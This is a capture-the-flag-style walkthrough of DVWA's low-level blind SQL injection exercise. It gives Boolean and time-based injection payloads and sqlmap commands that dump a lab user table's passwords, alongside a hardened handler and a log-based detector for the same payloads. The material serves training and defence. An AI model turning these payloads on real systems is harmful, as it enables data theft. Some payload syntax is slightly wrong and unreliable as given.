DVWA: SQL Injection (Blind) (low)

SQL Injection (Blind)

Interface

Source code

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Code analysis

The handler checks whether the id entered by the user exists in the users table. If it does, the page prints "User ID exists in the database."; if it does not, the page returns a 404 and prints "User ID is MISSING from the database." The id is concatenated straight into the SQL string without any validation or escaping, so there is a SQL injection vulnerability. Because neither query results nor database errors are shown (the 'or die' and the '@' suppress them), the only feedback an attacker gets is the exists/missing response and the response time, which is why this level has to be exploited blind.
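For comparison, here is the same lookup written the way the handler should be: the id is validated as a plain integer and passed to a prepared statement, so the input can never change the query's structure and no database error text reaches the browser. This is an added example, not DVWA's own code for any of its security levels; it assumes, as the page's snippet does, that $GLOBALS["___mysqli_ston"] holds the open mysqli connection.

```php
<?php
// Added example (not DVWA's code): hardened version of the low-level handler.
// Assumes $GLOBALS["___mysqli_ston"] is the open mysqli connection, as in DVWA.

if (isset($_GET['Submit'])) {
    $id = $_GET['id'] ?? '';

    // user_id is an integer column, so reject anything that is not a plain
    // decimal number before it ever reaches the database. ctype_digit('')
    // is false, so a missing id is rejected too.
    if (!is_string($id) || !ctype_digit($id)) {
        header($_SERVER['SERVER_PROTOCOL'] . ' 400 Bad Request');
        echo '<pre>Invalid user ID.</pre>';
        exit;
    }

    $conn = $GLOBALS["___mysqli_ston"];

    // Prepared statement: the SQL text goes to the server without the value,
    // and the value is bound separately as an integer. Quotes, '#' comments,
    // and sleep() calls in the input are just data and never parsed as SQL.
    $stmt = mysqli_prepare($conn, 'SELECT first_name, last_name FROM users WHERE user_id = ?');
    if ($stmt === false) {
        // Never echo mysqli_error() to the user: that would turn a blind
        // injection into an error-based one. Log it server-side instead.
        error_log('sqli_blind: prepare failed: ' . mysqli_error($conn));
        header($_SERVER['SERVER_PROTOCOL'] . ' 500 Internal Server Error');
        exit;
    }
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);

    // Same user-visible behaviour as the original page, so the application
    // still works; only the injection path is gone.
    if (mysqli_stmt_num_rows($stmt) > 0) {
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found');
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysqli_stmt_close($stmt);
    mysqli_close($conn);
}
?>
```

The integer check and the prepared statement are independent defences: the prepared statement alone already blocks injection, and the type check additionally stops malformed input from consuming a database round trip and gives a clean 400 instead of a misleading "missing" answer.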

Penetration steps

Three approaches are given: Boolean-based blind injection, time-based blind injection, and using sqlmap to obtain the result.

1. Boolean-based blind injection

Step 1: Construct the statement 1' and 1=1# and check the result: the page reports that the user ID exists.
Step 2: Construct the statement 1' and 1=2# and check the result: the page reports that the user ID is missing. From steps 1 and 2 it can be seen that if the condition appended after the id is true, the page reports that the ID exists; otherwise it reports that it is missing.
Step 3: Guess the number of tables in the current database. Construct the statement 1' and length(select count(table_name) from information_schema.tables where table_schema=database())=x# and change the value of x; when the page reports that the ID exists, x is the number of tables. Result:
When x=1, the page reports that the ID is missing.
When x=2, the page reports that the ID exists, so the current database has 2 tables.
Step 4: Guess the length of the first table name. Construct the statement 1' and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=x# and change the value of x until the page reports that the ID exists; x is then the length of the table name. Result: x=9.
Step 5: Use binary search to guess the table name. Construct the statement 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>x#, where x is an ASCII value: 65-90 are the 26 uppercase letters and 97-122 are the 26 lowercase letters. First let x=97 to check whether the character is lowercase, then let x=109, and so on, halving the range each time. Table names guessed this way: guestbook, users.
Step 6: Guess the length of the first field of the users table. Construct the statement 1' and length(select column_name from information_schema.columns where table_name='users' limit 0,1)=x#; the method is the same as in step 4. Result: x=8.
Step 7: Guess the first field of the table, using the same method as in step 5 (the ascii(substr(...))>x# comparison) applied to the subquery from step 6: select column_name from information_schema.columns where table_name='users' limit 0,1.

2. Time-based blind injection

Step 1: Test whether time-based blind injection is possible. Input 1' and sleep(5)#: there is a noticeable delay. Input 1 and sleep(5)#: there is no delay. From this it is judged that there is a string-type (quoted) time-based blind injection.
Step 2: The same steps as for Boolean-based blind injection, guessing the table name. Construct the statement 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1)#: no delay. 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1)#: obvious delay, indicating that the first table name has 9 characters.
Step 3: The remaining SQL statements are constructed the same way as in the Boolean-based method, with the condition wrapped in if(..., sleep(5), 1) and the result judged by whether the response is delayed.
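From the defender's side, both blind techniques above leave a recognisable trail in the web server access log: quoted-and-commented conditions, 1=1 / 1=2 tautologies, sleep() calls, information_schema lookups, and substr()/ascii()/length() character extraction, usually as a long run of near-identical requests from one client. The following detector is an added example, not part of the original post or of DVWA; it scans Combined Log Format lines for those payload shapes. The log lines and the sqlmap-style User-Agent string are constructed for the example, and the request paths mirror the DVWA URL used on this page.

```php
<?php
// Added example (not from the original post): flag the blind SQL injection
// payload shapes shown in this walkthrough in web server access logs.

function decodeQuery(string $request): string {
    // "GET /path?query HTTP/1.1" -> decoded, lower-cased query string,
    // so %27 becomes ' and + becomes a space before matching.
    $parts  = explode(' ', $request);
    $target = $parts[1] ?? '';
    $query  = parse_url($target, PHP_URL_QUERY) ?? '';
    return strtolower(urldecode($query));
}

function sqliIndicators(string $query, string $userAgent): array {
    $hits = [];
    // Each rule corresponds to a payload shape used in the steps above.
    $rules = [
        'quote-and-comment'  => "/'\\s*(and|or)\\b.*(#|--)/",   // 1' and ... #
        'tautology'          => "/\\b1\\s*=\\s*[12]\\b/",       // 1=1 / 1=2
        'time-delay'         => "/\\b(sleep|benchmark)\\s*\\(/", // sleep(5)
        'schema-enumeration' => "/information_schema\\./",      // tables/columns
        'char-extraction'    => "/\\b(substr|substring|ascii|length)\\s*\\(/",
    ];
    foreach ($rules as $name => $re) {
        if (preg_match($re, $query)) {
            $hits[] = $name;
        }
    }
    // Tools that do not change their default User-Agent identify themselves.
    if (stripos($userAgent, 'sqlmap') !== false) {
        $hits[] = 'sqlmap-user-agent';
    }
    return $hits;
}

function scanLog(array $lines): array {
    $findings = [];
    // Combined Log Format: ip ident user [time] "request" status bytes "referer" "ua"
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    foreach ($lines as $line) {
        if (!preg_match($re, $line, $m)) {
            continue; // not a well-formed log line, skip it
        }
        [, $ip, $time, $request, $status, $ua] = $m;
        $hits = sqliIndicators(decodeQuery($request), $ua);
        if ($hits) {
            $findings[] = ['ip' => $ip, 'time' => $time, 'status' => $status, 'indicators' => $hits];
        }
    }
    return $findings;
}

// Constructed sample lines (not real traffic). Line 1 is a normal request;
// lines 2-3 carry the Boolean and time-based probes from the steps above;
// line 4 carries a constructed sqlmap-style User-Agent.
$sample = [
    '192.168.45.1 - - [10/Jan/2021:10:00:01 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
    '192.168.45.1 - - [10/Jan/2021:10:00:05 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1%27+and+1%3D2%23&Submit=Submit HTTP/1.1" 404 1520 "-" "Mozilla/5.0"',
    '192.168.45.1 - - [10/Jan/2021:10:00:09 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1%27+and+sleep%285%29%23&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
    '192.168.45.1 - - [10/Jan/2021:10:01:00 +0000] "GET /DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.x (constructed)"',
];

foreach (scanLog($sample) as $f) {
    printf("%s %s HTTP %s -> %s\n", $f['time'], $f['ip'], $f['status'], implode(', ', $f['indicators']));
}
```

Run against the sample, the first line produces nothing, the 1=2 probe is flagged as quote-and-comment and tautology, the sleep probe as quote-and-comment and time-delay, and the last line only by its User-Agent. A single hit is a weak signal on its own; the Boolean and time-based methods need dozens of requests per extracted character, so counting flagged requests per client over a short window is what separates a probe from noise, and the 404 status on the "missing" answers is an additional correlating signal for this particular page.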

3. Use sqlmap

Install sqlmap on Windows 10.
Step 1: Input anything, capture the request with Burp Suite, and read off the destination address: 192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit# and the cookie: security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5
Step 2: Use sqlmap to test the URL. Enter: sqlmap.py -u "http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5" --batch. After a while sqlmap gives the test result: the parameter can be injected in three ways, Boolean-based, error-based and time-based.
Step 3: Use sqlmap to list the databases. Enter: sqlmap.py -u "http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5" --batch --dbs
Step 4: List the tables in the dvwa database. Enter: sqlmap.py -u "http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5" --batch -D dvwa --tables
Step 5: List the columns of the users table. Enter: sqlmap.py -u "http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5" --batch -D dvwa -T users --columns
Step 6: Dump the contents of the user and password columns. Enter: sqlmap.py -u "http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5" --batch -D dvwa -T users -C "user,password" --dump. You can then watch sqlmap cracking the hashed passwords, and after a while the plaintext passwords are shown.

Origin blog.csdn.net/qq_37589805/article/details/112483002